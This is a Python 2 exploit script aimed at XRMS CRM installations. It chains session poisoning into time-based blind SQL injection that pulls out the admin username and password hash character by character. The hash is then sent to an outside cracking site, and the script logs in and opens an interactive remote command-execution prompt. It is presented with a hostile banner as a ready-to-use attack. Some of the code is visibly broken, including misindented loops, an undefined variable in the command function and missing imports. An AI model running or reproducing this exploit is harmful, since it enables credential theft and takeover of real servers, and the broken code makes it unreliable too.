usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
   / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
  /_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
               /_/                              
  [+] fuq th3 w0rld, fuq ur m0m!\n"""
 
def usage():
  print "  [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
  print "  [+] Example:"
  print "  [+] python " + sys.argv[0] + " domain.to/xrms"
  quit()
 
def sendhashaway(hash):
  print " [+] Sending hash to icrackhash.com to be cracked."
  data = None
  headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
  url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
  gh = urllib2.Request(url,data,headers)
  gh2 = urllib2.urlopen(gh)
  output = gh2.read()
  plaintext = getpositions(output,'<td><small><strong>','</strong>')
  print " [-] Plaintext of hash: " +plaintext + "\n"
  return plaintext
 
def username(length):
  length = length + 1
  duser = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          duser.append(usercharac[f])
          found = 1
  return duser
 
def getusernamelength():
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
  payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
  while (found != 1): 
    class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
      def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
      http_error_300 = http_error_302    
    class HeadRequest(urllib2.Request):
      def get_method(self):
        return "POST"
    payload = payload1 + str(i) + payload2
    data = urllib.urlencode([('user_id',payload)])
    url = 'http://'+domain+'/plugins/webform/new-form.php'
    opener = urllib2.build_opener(LeHTTPRedirectHandler)
    req = HeadRequest(url,data)
    prepare = opener.open(req)
    cookie1 = prepare.info()
    cookie2pos1 = str(cookie1).find('PHPSESSID')
    cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
    line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
    line = 'XRMS' + line[9:]
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
    headers = { 'Cookie' : line }
    data = None
    start = time.time()
    get = urllib2.Request(url,data,headers)
    get.get_method = lambda: 'HEAD'
    try:
      execute = urllib2.urlopen(get)
    except:
      pass
    elapsed = (time.time() - start)
    if(elapsed > 1):
      print "  Length found at position: " + str(i)
      found = 1
      length = i
      return length
    i = i + 1
 
def password(length):
  length = length + 1
  dpassword = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          dpassword.append(usercharac[f])
          found = 1
  return dpassword
 
def login(domain,user,password):
  cookie = "XRMS=iseeurgettinown4d"
  url = 'http://'+domain+'/login-2.php'
  headers = { 'Cookie' : cookie }
  data = urllib.urlencode([('username',user),('password',password)])
  a1 = urllib2.Request(url,data,headers)
  a2 = urllib2.urlopen(a1)
  output = a2.read()
  if output.find('PEAR.php') > 0:
    print "  [+] Logged In"
 
def commandexec(domain,command):
  cookie = "XRMS=iseeurgettinown4d"
  cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
  headers = { 'Cookie' : cookie }
  data = None
  url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
  b1 = urllib2.Request(url,data,headers)
  b2 = urllib2.urlopen(a1)
  output = b2.read()
  first = output.find('0x41') + 4
  last = output.find('14x0') - 4
  return output[first:last]
 
banner()
if len(sys.argv) < 2:
  usage()
domain = sys.argv[1]
print "  [+] Grabbing username length"
length = getusernamelength()
print "  [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "  [+] Grabbing password hash"
tmppass =  password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "  [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
  cmd = raw_input('  [+] Run a command: ')
  if cmd == 'quit':
    print "  [-] Hope you had fun :)"
    quit = 1
  if cmd != 'quit':
    print "  [+] "+ commandexec(domain,cmd)

(758)